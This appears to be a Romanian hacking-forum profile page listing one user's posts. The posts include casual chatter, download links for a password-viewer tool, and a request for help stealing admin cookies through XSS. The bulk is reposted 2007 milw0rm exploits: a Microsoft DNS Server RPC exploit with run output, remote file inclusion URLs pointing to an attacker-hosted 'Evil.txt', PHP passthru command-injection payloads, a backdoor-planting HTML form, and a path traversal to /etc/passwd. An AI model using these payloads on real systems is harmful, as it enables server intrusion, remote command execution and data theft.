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Everything posted by buRn
Intrebarile nu se scriu in pm , ii pot ajuta si pe altii raspunsurile la acele intrebari .
Asta e tutorialul tau despre care vorbeam pe mess ? Am sa-l citesc maine , voi reveni cu un edit .
veche dar prea tare :twisted:
Nu am mai lucract de 2 luni in PhotoShop chiar mai mult . Astazi dupa ce l-am downloadat am zis sa fac ceva sa imi treaca plictiseala , in 5 minute ma plictis i. De obicei imi ies faine majoritatea , dar la asta nu am stat , mai mult ma uitam la tv ) Ce parere aveti ? Rezultat :
Mic utilitar care prezinta paorlele pastrate de Internet Explorer . Are suport pentru toate variantele de IE inclusiv versiunea 7.Bun daca vrei sa-ti muti informatiile in alt browser. Download SpeedyShare http://www.speedyshare.com/430841385.html RapidShare http://rapidshare.com/files/31318518/IE_PassView_1.02.rar.html
Manager de fonturi cu optiuni deosebite . Download RapidShare [url]http://rapidshare.com/files/31317153/FontFrenzy_1.5.rar.html[/url] SpeedyShare http://www.speedyshare.com/426334752.html
Uite :wink: RapidShare: http://rapidshare.com/files/31220281/free_phpbb.zip.html SpeedyShare: http://www.speedyshare.com/114207526.html Bafta .
Ca tot este vorba de xss , vladiii am o cerere la tine . Sa zicem ca am gasit un xss in yahoo/un site anume .. Vreau sa obtin cookiurile de la admini. Cum formez acest cookie Imi poti explica ?
Bravo . Se pare ca tu esti singurul , pana acum . E asa greu ?
primul meu proiect in visual basic ( daca il pot numi un proiect ) Link : http://rapidshare.com/files/29767892/Crack_me.exe.html
ENCODED , unu cu buRn daca se poate
De unde cumpar un domeniu cu card , fara sa vina factura ceva ? :roll:
salut . Tutoriale sunt o gramada , foloseste doar butonul "cauta" daca nu gasesti , deschide un topic in categoria "Cereri"
vladiii ... you are dumb ?!
Exploit v2 features: - Target Remote port 445 (by default but requires auth) - Manual target for dynamic tcp port (without auth) - Automatic search for dynamic dns rpc port - Local and remote OS fingerprinting (auto target) - Windows 2000 server and Windows 2003 server (Spanish) supported by default - Fixed bug with Windows 2003 Shellcode - Universal local exploit for Win2k (automatic search for opcodes) - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled) - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns) - Microsoft RPC api used ( who cares? ) D:\Programación\DNSTEST>dnstest -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- Usage: dnstest -h (Universal local exploit) dnstest -h host [-t id] [-p port] Targets: 0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3) 1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k ) 2 (0x7c4fedbb) - Win2k server SP4 English 3 (0x7963edbb) - Win2k server SP4 Italian 4 (0x41414141) - Windows all Denial of Service D:\Programación\DNSTEST>dnstest.exe -h -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- [+] Trying to fingerprint target.. (05.02) [+] Remote Host identified as Windows 2003 [-] No port selected. Trying Ninja sk1llz [+] Binding to ncacn_ip_tcp: [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0 [+] RPC binding string: ncacn_ip_tcp:[1105] [+] Dynamic DNS rpc port found (1105) [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:[1105] [+] RpcBindingFromStringBinding success [+] Sending Exploit code to DnssrvOperation() [+] Now try to connect to port 4444 also available at http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip http://www.milw0rm.com/sploits/04172007-dnsxpl.v2.1.zip # milw0rm.com [2007-04-18]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Y! Underground Team + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Portal......: jGallery 1.3 + + Author......: Dj7xpl / Dj7xpl@Yahoo.com + + Type........: Remote File Inclusion Vulnerability + + Dork........: intitle:"jGallery" + + Download....: http://portal.kooijman-design.nl/jGallery/README.html + + Page........: http://Dj7xpl.2600.ir + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Bug.........: http://[Target]/[Path]/index.php?G_JGALL[inc_path]=http://[EvilSite]/Evil.txt%00 + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # milw0rm.com [2007-04-18]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Y! Underground Group + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Portal......: Mozzers SubSystem v1.0 Final + + Author......: Dj7xpl / Dj7xpl@Yahoo.com + + Type........: Remote Code Execution Vulnerability + + Download....: http://sourceforge.net/projects/subsystem/ + + Page........: http://Dj7xpl.2600.ir + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Bug.........: + + (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add + + (2) Insert Bad Code Into (Sub-name) Or (Sub-url) E.g :<?passthru($cmd);?> + + (3) See Your Bad Code : http://[Target]/[Path]/subs.php + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # milw0rm.com [2007-04-18]
<!-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Y! Underground Group + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Portal......: AimStats v3.2 + + Author......: Dj7xpl / Dj7xpl@Yahoo.com + + Type........: Remote Code Execution + + Download....: http://www.x-pose.org/aimstats.php + + Page........: http://Dj7xpl.2600.ir + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Xpl.........: + --> <html><head><Title>---===AimStats v3.2===------===Dj7xpl===---</title></head> <body bgcolor="red"> <center> <form name="AimStats" method="post" action="http://site.com/path to aimstats/process.php?update=yes"> <input name="taglinelimit" value="777" type="hidden" > <input name="number" value="11; passthru($_GET[cmd]);//;" type="hidden" > <input type="submit" name="Submit" value="Submit" > </form> <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font> <font color="#C0FF3E" size="+1"> And See Backdoor into http://[Target]/[Path]/config.php?cmd=shell</font></br> <font color="#C0FF3E" size="+1"> E.g : http://site.com/aimstats/config.php?cmd=ls -la</font> </center> </body> </html> <!-- + + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- --> # milw0rm.com [2007-04-18]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Y! Underground Group + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Portal......: Zomplog v3.8 + + Author......: Dj7xpl / Dj7xpl@Yahoo.com + + Type........: Remote File Disclosure Vulnerability + + Download....: www.zomp.nl/zomplog + + Page........: http://Dj7xpl.2600.ir + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + Bug.........: http://[Target]/[Path]/upload/force_download.php?file=[Local Path] + + E.g.........: http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd + + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # milw0rm.com [2007-04-18]
# osp <= 1.2.1 (cfgPathToProjectAdmin) Remote File Include Vulnerablities # D.Script: http://nlcac.internationalstudents.asn.au/osp1.01RC1.tar http://sourceforge.net/projects/osp/ << latest # Discovered by: Alkomandoz Hacker # Homepage: http://www.asb-may.net & TrYaG.CoM & MoHaNdKo.CoM # Exploit: [Path]/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=Shell ----------------------- ---- Thanx: [KaBaRa.hAcK.eGy] [Mahmood_ali] [3theaby Gheer] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [ Cold-Zero ] [ No4Hard ] [ MoHaNdKo ] ---- GreeTz: All www.Asb-May.bet & WwW.MoHaNdKo.CoM & WwW.TrYaG.CoM # milw0rm.com [2007-04-18]
lasa cumnate ca iti dau ei supernova , cand intri pe net .